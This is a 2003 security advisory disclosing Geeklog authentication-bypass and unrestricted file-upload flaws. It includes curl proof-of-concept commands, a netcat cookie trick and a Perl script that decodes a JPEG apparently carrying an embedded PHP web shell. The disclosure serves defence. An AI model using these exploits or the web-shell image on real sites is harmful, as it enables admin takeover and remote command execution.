[UNIX] Geeklog Multiple Vulnerabilities (Integer Rounding, File Upload)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/03


To: list@securiteam.com
Date: 31 May 2003 15:16:21 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Geeklog Multiple Vulnerabilities (Integer Rounding, File Upload)
------------------------------------------------------------------------

SUMMARY

 <http://geeklog.sourceforge.net/index.php?topic=GeekLog> Geeklog is "a
web content management system suitable for running full-featured community
sites. It supports article posting, threaded comments, event scheduling,
and link management and is built around a design philosophy that
emphasizes ease of use". Multiple security vulnerabilities have been found
in the product, one allows gaining of elevated privileges by providing a
non-integer value as your userid, the another allows uploading of any file
you want regardless of its extension (from this arbitrary commands can be
executed).

DETAILS

Vulnerable systems:
 * Geeklog version 1.3.7sr1 and below

SQL Integer manipulation in authentication script
Vulnerable code:
from lib-sessions.php line 128
------------------------------------------------
       if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
           // Session cookie doesn't exist but a perminant cookie does.
           // Start a new session cookie;
           if ($_SESS_VERBOSE) {
               COM_errorLog('perm cookie found from lib-common.php',1);
           }

           $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
           $cookie_password =
$HTTP_COOKIE_VARS[$_CONF['cookie_password']];

           //echo $userid;

           $userpass = DB_getItem($_TABLES['users'],'passwd',"uid =
$userid");

           if ($cookie_password <> $userpass) {
               // User could have modified UID in cookie, don't do shit

           } else {
               if ($userid) {
                   $user_logged_in = 1;
                   //echo $userid;
                   // Create new session and write cookie
                   $sessid = SESS_newSession($userid, $REMOTE_ADDR,
$_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                   SESS_setSessionCookie($sessid,
$_CONF['session_cookie_timeout'], $_CONF['cookie_session'],
$_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
   $userdata = SESS_getUserDataFromId($userid);
   $_USER = $userdata;
               }
           }
       }

In this case:
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd from $_TABLES['users'] where uid=$userid"

When we supply a non-existing user we can bypass the ($cookie_password <>
$userpass) check, because both $userpass and $cookie_password will be
null.

Example:
curl -b geeklog=9999 http://blablaba/users.php

SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'],
$_CONF['cookie_ip']);
Will execute the SQL query:
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid,
start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime,
'$remote_ip')"

Valid session for user 9999 does not exist, this means it will be inserted
to database.

Integer manipulation to achieve administrative access
By supplying a floating-point number as userid, a user can easily login as
any Geeklog user. This is because userid is integer value in database and
floating-point number always given a null value for $userpass
(non-existing user). The value 2.1 will inserted as the value 2 in column
(since the column is of an integer data type).

Proof of concept:
curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

Where header.txt will contain valid session for admin.

Uploading image with any extension
There is inadequate error checking in upload image scripts, this will
allow a user to upload a file with any extension (this vulnerability is
found in both the users.php and stories.php module). By embedding PHP code
in the image, users can execute any command as the user 'nobody' on the
remote server.

Proof of concept:
i) Upload the attached file to server using "Internet Explorer". "Internet
Explorer" will use file header to generate mime-type for uploaded file.

ii) Execute 'curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php'

Vendor response:
Vendor has been contacted on 19/05/2003 and fix version is available
http://www.geeklog.net

Image.php creation:
To create the image.php file use the following perl script:
#!/usr/bin/perl
use MIME::Base64;

$File = <<EOF;
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
OhAEB//Z
EOF

$decoded = decode_base64($File);
print $decoded;

Tips:
Simple way to trick Mozilla to store session from any site.

i) Edit header.txt.
----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 GMT;
path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

----------------header.txt --------------------------

ii) Using netcat netcat
# nc -l -p 9090 < header.txt

iii) Set your Mozilla http proxy server to 127.0.0.1:9090

iii) Browse to http://blablaba.com/

iv) Unset proxy and browse to http://blablabla.com

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: File Upload - Security Issues
    ... You want to upload a file for what reason and ... these viruses have less chance of being able to execute (even if succeeded ... :> file and what pitfalls you see re: security might be helpful on this ... :>: files to an IIS server that doesn't have MS Office actually installed? ...
    (microsoft.public.scripting.vbscript)
  • Re: File Upload - Security Issues
    ... uploaded and the user could upload any or all of these in theory. ... There is no one product that can give you 100% security, ... > Code doesn't execute in local memory space unless remote user has rights ... > You don't have MS Office installed on the server. ...
    (microsoft.public.scripting.vbscript)
  • [Full-disclosure] Google Inc., (Youtube.com) Unrestricted File Upload Vulnerability.
    ... Google's YouTube Unrestricted File Upload Report ... Advanced Information Security Corporation, ... YouTube is a video-sharing website, ... users can upload, view and share videos. ...
    (Full-Disclosure)
  • Re: [Full-disclosure] Google vulnerabilities with PoC
    ... you keep calling it a "vulnerability" with 0 evidence that it's even ... You keep throwing around keywords like OWASP, OSI, "security best ... As for the exploitability of this vulnerability, ... file upload to youtube CDN any worse than to google drive CDN? ...
    (Full-Disclosure)
  • Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
    ... citing that there has been a security hole on Youtube ... which is essentially a video file upload service. ... You can't execute the files you ...
    (Full-Disclosure)